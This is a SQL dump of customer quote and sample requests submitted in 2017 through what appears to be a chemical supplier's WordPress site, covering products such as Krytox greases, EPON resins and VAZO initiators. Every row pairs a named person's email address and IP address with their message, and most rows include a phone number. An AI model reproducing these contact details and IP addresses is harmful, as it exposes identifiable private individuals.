INSERT INTO `wp_enquiry_detail_new` VALUES (971, 'David Fagerquist', 'dfagerquist@michaelcurrydesign.com', 'We build a multitude of sizes and configurations as well as use a variety of composite materials. These would include Silicon rubber, urethane foams and rubbers, epoxy, polyester and butyl rubber. I would like info/sample kit for your releases if available. Thank you,\nDavid', '503543-4010', 'Samples', '173.8.218.57', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"297";s:5:"title";s:13:"ReleaSys 8200";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_524224879.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-22 17:20:04', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (972, 'Heather Jenkins', 'hjenkins@draper.com', 'Hello, I am from Draper Laboratory. I am looking for a quote on one of you products: MS-782 ( 5 GALLON PAIL ). Please let me know if you need any other information, I look forward to your response. Sincerely Heather Jenkins| Draper 555 Technology Square, MS1 | Cambridge, MA 02139-3563 Email: hjenkins@draper.com ', '', '', '192.80.95.230', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1278";s:5:"title";s:10:"Vertrel XF";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-xf.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-22 18:02:22', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (973, 'Marek Alliksoo', 'marekalliksoo@gmail.com', 'Dear Sirs\n\nWe\'re looking for 50kg total of Epon 828 (dielectric constant 4.3)\nPlease let us have the quote and closest purchasing location or transport estimation to Vietnam if possible.\n\nBest regards,\nMarek', '+37256729717', 'EPON™ 828 ', '146.255.183.39', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:2:"50";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-22 20:04:37', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (974, 'Ana Costa', 'anahelena.pcosta@gmail.com', 'I\'d like to get a price quote on the krytox 143AC lubricant. \n\nThank you!', '', '', '187.65.151.12', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"582";s:5:"title";s:5:"143AC";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_421483921.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-22 20:18:33', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (975, 'Nathan ', 'nathanh@sipptech.com', 'Inquiry on price for MS-222N. Is it available per can/case? Thank you.', '913229-7826', 'MS-222N price', '99.121.104.36', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-22 20:34:45', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (976, 'Chad Loftis', 'cloftis@nuvasive.com', 'Looking for an implantable / biocompatible alternative to KRYTOX for use within medical devices', '858320-5253', 'Biocompatible Lubricant', '173.226.98.250', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"468";s:5:"title";s:44:"TriboSys™ Fluorinated Synthetic Lubricants";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:67:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Mi.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-23 01:20:58', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (977, 'Harsheen Kaur Anand', 'harsheenanand23@gmail.com', 'what is the cost per litre', '+917888582541', 'cost', '115.111.223.51', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1287";s:5:"title";s:4:"Sion";s:5:"price";s:0:"";s:5:"quant";s:3:"100";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/opteon-sion.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-23 06:58:34', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (978, 'Luke Chou', 'luke.chou@newayvalve.com', 'We manufacture oxygen clean valve and do repairs or rework on oxygen products, would like to know what what a 1kg jar or 5kg pail would cost. please indicate break point for potential "discount" if we purchase in bulk.\n\nNRT8906\n\nalso interested in GPL206\n\nthanks,', '214793-5041', 'RFQ, pricing comparison', '173.11.150.34', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"880";s:5:"title";s:8:"NRT 8906";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_414620641.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-23 14:48:24', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (979, 'Ben Green', 'bgreen@gastops.com', 'To whom it may concern:\nHello,\n my employer ( Gastops ltd. ) is looking to acquire a small sample of Krytox 157FSL in support of a research project in collaboration with the University of Sherbrooke (Quebec). \n\nIs a research sample of this product available?\n\nThank you,\nBen G. ', '', 'Research Sample', '207.236.97.130', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"960";s:5:"title";s:7:"157 FSL";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:104:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Chemours-Krytox-Group-Oil-Scale-300-dpi.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-23 17:06:10', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (980, 'Mike Castelletti', 'amcastelletti@olin.com', 'I would like to purchase the 16 oz spray of this product.  Could you tell me the cost, ordering process, and if there is a minimum purchase quantity/dollar amount.\n\nThanks.', '716278-6463', 'purchase', '208.87.237.201', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-23 20:34:13', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (981, 'Darren Bradley', 'dbradley@spectrumgas.com', 'Can i get a price for your GPL226 in the cartridge 1.76lbs', '714444-0477', 'GPL226', '12.34.54.234', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"850";s:5:"title";s:7:"GPL 226";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_92739160.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-23 21:05:36', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (982, 'Rosa Vasconez', 'rvasconez@cpp.edu', 'Please email me a quote for the lubricant.\nInclude shipping costs to 3801 W Temple Ave, Pomona, CA 91768', '617484-4643', 'Quote', '47.149.35.160', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1681";s:5:"title";s:8:"MS-122XD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122xd-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-25 06:59:17', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (983, 'Jeff Kitchen', 'jeff_kitchen@xtrac.com', 'Need to by one, for testing.  Please quote price and delivery, and/or local distributors.\n\nThank you,', '317510-1463', '', '207.141.121.26', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1012";s:5:"title";s:6:"XP 2A5";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-bearing-grease5.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-25 12:39:51', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (984, 'Reecha Pandya', 'reecha.pandya@abbott.com', 'I would like to request a quote for one quart and one gallon of MS-143XD, respectively. Thank you!', '609454-9132', 'Quote Request', '130.36.63.135', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"306";s:5:"title";s:8:"MS-143XD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-143XD.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-25 14:24:37', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (985, 'James Tinch', 'JTinch@mfgchemical.com', 'I am writing to inquire about purchasing 100g of the VAZO 52 for lab testing. ', '706226-4114', '100 g Purchase please', '205.144.213.137', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"568";s:5:"title";s:7:"VAZO 52";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:79:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-pca-oil.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-25 17:23:17', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (986, 'Jason Lamb', 'jlamb8080@gmail.com', 'I would like a price quote on the MS-907 Two part epoxy kit.', '513967-2541', '', '24.199.209.138', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-25 18:42:28', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (987, 'Jason Lamb', 'jlamb@geophex.com', 'Hi I would like a price quote on one Epikure 3253.\n\nThanks', '513967-2541', '', '24.199.209.138', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1865";s:5:"title";s:15:"EPIKURE™ 3253";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-25 18:48:17', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (988, 'Jason Lamb', 'jlamb@geophex.com', 'Hi I would like a price quote on the MS-907 Two part epoxy kit.', '513967-2541', '', '24.199.209.138', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-25 18:50:15', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (989, 'steve mauger', 'smauger@linear.com', 'please quote 8 oz tube and 1 lb tub.', '360834-1900', 'quote ', '50.207.163.254', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"638";s:5:"title";s:5:"240AZ";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_300460277.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-25 22:34:12', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (990, 'Vahid Ahsani', 'ahsaniv@uvic.ca', 'Hi,\nWe would like to order this product for the University of Victoria in Canada. Please send us a quote so that we can put the order ASAP .\nThanks', '778903-4026', 'Ordering MS_907 Epoxy', '142.104.85.188', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-25 23:06:38', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (991, 'Sergii Onyshchenko', 's.onyshchenko@aim-aviation.com.ua', 'Dear Sales Team,\nplease advise your quote for\nKRYTOX 240AC, 2 OZ TUBE, QTY: 24 EA.\nThank you.\nSergii\nAero Inventory Management, LLC\n7 Pavla Dybenko str., Kyiv, 04209, UKRAINE\nTel/Fax. +38-044-225-2808\nMob. +38-067-538-2213  e-mail: s.onyshchenko@aim-aviation.com.ua\nwww.aim-aviation.com.ua', '+380675382213', 'RFQ KRYTOX 240AC, 2 OZ TUBE.', '212.9.238.94', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"644";s:5:"title";s:5:"240AC";s:5:"price";s:0:"";s:5:"quant";s:2:"24";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_125931485.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-26 11:11:12', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (992, 'Teddy Ha', 'teddyha77@hotmail.com', 'Hello,\nPlease quote on MS-143TE, 1EA of 5 Gallon pail.\nThank you,\nTeddy\nTCM Industries LLC\nEnglewood Cliffs, NJ', '201569-2221', 'RFQ : MS-143TE', '67.250.74.151', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"303";s:5:"title";s:8:"MS-143TE";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-143TE.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-26 11:43:32', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (993, 'Samantha Goetz', 'sgoetz@draper.com', 'Would like to request a quote for 1 gallon.\n\nThank you!', '617258-3524', 'Epikure 3370', '192.80.95.230', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1061";s:5:"title";s:15:"EPIKURE™ 3370";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPIKURE-3370.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-26 14:12:05', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (994, 'Terry Creasy', 'tcreasy@tamu.edu', 'We typically buy in 1 gallon amounts over time. Rather than store excess in our lab. Will need 10 gallons or more overall. Also need cure agent for 350F cure.  Thanks, Dr. Creasy ', '979458-0118', 'Need epon for research ', '165.91.12.59', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"887";s:5:"title";s:11:"EPON™ 862";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-862.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-29 15:48:56', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (995, 'jamie', 'jamiegrant@gmx.com', 'Do you have these in Canada and what is the unit cost please', '403618-1782', 'inquiry', '208.98.234.16', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:1:"5";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-29 19:04:02', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (996, 'Braulio Cárdenas', 'brauliocar92@gmail.com', 'I\'m a research associate at Tecnológico de Monterrey, (México) and I\'m looking for a quote for this AIBN product,\n\nThank you very much,\n\nRegards,\n\nBraulio Cárdenas', '+528115097489', 'Quote request for AIBN', '131.178.200.50', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"427";s:5:"title";s:7:"VAZO 64";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/VAZO-64-2.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-29 19:41:31', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (997, 'Ricky Biittig', 'ricky.biittig@siigroup.com', 'I\'m interested in pricing and availability for n-butylglycidylether FCL in drums to our facility in Rotterdam Junction, NY.  \nAnticipated annual usage is ~80 drums for 2018.', '518347-4454', 'n-butylglycidylether', '66.162.182.183', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1069";s:5:"title";s:12:"HELOXY™ 61";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/HELOXY-61.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-30 13:08:06', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (998, 'Craig Stevens', 'craig.stevens@nninc.com', 'I would like to get price and delivery information on the Kryton XHT - BDZ grease', '203336-7501', 'Krytox XHT-BDZ grease', '47.23.134.26', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"696";s:5:"title";s:7:"XHT-BDZ";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_68906731.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-30 13:08:31', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (999, 'Barbara Davidson', 'b.davidson@sierratechnicalservices.com', 'Please quote the following. If you have any questions, please call me.\n\nThank you', '661823-1902', 'Price Quote', '104.137.149.50', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"310";s:5:"title";s:13:"ReleaSys 8900";s:5:"price";s:0:"";s:5:"quant";s:1:"3";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_523637050.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-30 15:54:46', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1000, 'Jesus Marquez', 'jesus.marquez@amphenol-tcs.com', 'To Whom it may concern,\nWould you please provide me with a sample quote and the different presentation you may have this product available ASAP.\n\nWe need to develop a new process and this item is critical for you production plan.\n\nThank you in advance,\nRegards\nBuyer\nJM', '', 'Sample Quote', '164.109.35.207', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"708";s:5:"title";s:8:"XHT-1000";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_373999234.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-30 16:34:49', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1001, 'Brett Bell', 'brett.bell@smith-nephew.com', 'I would like some additional information on Tribosys oils and greases. \nOne application is a lead screw, the other is a piston. The lead screw would be permanently lubed, the piston would be re-lubed every sterilization cycle.', '412683-3844', 'medical lubricants', '208.87.234.201', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"468";s:5:"title";s:44:"TriboSys™ Fluorinated Synthetic Lubricants";s:5:"price";s:0:"";s:5:"quant";s:1:"2";s:3:"img";s:67:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Mi.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-30 18:44:48', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1002, 'michael blas', 'mikeb@brunswickaviationservices.com', 'I would like to get price and availability on the MS-260 glass &amp; metal cleaner. How many cans are in a case?', '207447-9404', 'MS-260', '76.28.35.165', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-31 13:44:41', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1003, 'Jim Gardner', 'jgardner@nortechsys.com', 'Can you please quote Epon 828 in the quart container.  Include part number, price, and also cost for certificate of conformance', '218765-2314', 'Epon 828', '69.168.249.26', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-31 13:45:20', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1004, 'David Hall', 'david.w.hall@nasa.gov', 'Please provide a quote for quantity 1 of a 2oz Tube of Krytox XHT-ACX High Temp Perfluoroalkylether Grease\n\nThanks,\nDave', '281483-9781', 'RFQ', '139.169.216.96', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"674";s:5:"title";s:7:"XHT-ACX";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_292901249.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-31 14:43:38', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1005, 'Kurt Hinze', 'kurt.hinze@te.com', 'I\'m needing a price quote on some Krytox GPL-102 oil. Quantity of (1) 20.0 kg pail. Please contact me via E-Mail or the phone # listed above.\nThanks,\nKurt Hinze', '979413-7474', 'Krytox GPL-102 Price Quote', '198.175.154.239', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"437";s:5:"title";s:7:"GPL 102";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease2.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-31 17:08:13', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1006, 'Joe Epstein', 'joseph.epstein@lmco.com', 'We need to purchase this and the EPIKURE 3300 p', '650424-2324', '', '192.35.35.35', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-31 18:08:38', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1007, 'curt snyder', 'curts@atlas-tool.com', 'please quote price and delivery for Epon-828 and curing agent v-40.\n Can this be shipped overnight?', '708442-1661', 'request for Quote', '12.32.152.58', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-31 20:12:09', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1008, 'Andrew Pelkner', 'andrew.pelkner@technicair.com', 'Please quote lead time and price of 1 unit. Thank you ', '402951-3430', 'Need price &amp; Lead time of EPON 862', '204.239.11.6', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"887";s:5:"title";s:11:"EPON™ 862";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-862.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-31 20:19:12', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1009, 'Jessa Marie Derecho', 'jderecho@rnuable.com', 'Greetings!\n\nI am Jessa Marie from RNuable Energy Corporation here in PH. We are interested in buying Kryptox GPL 227, 1 Tube for our project with valves in Oxygen Plant. Can you quote? Also, do you have distributors here in PH?\n\nThank you.', '', 'Need GPL 227 here in Philipines', '203.177.237.226', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"852";s:5:"title";s:7:"GPL 227";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_316632911.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-01 06:51:43', '', NULL, '', '', '', NULL, '', ''); 
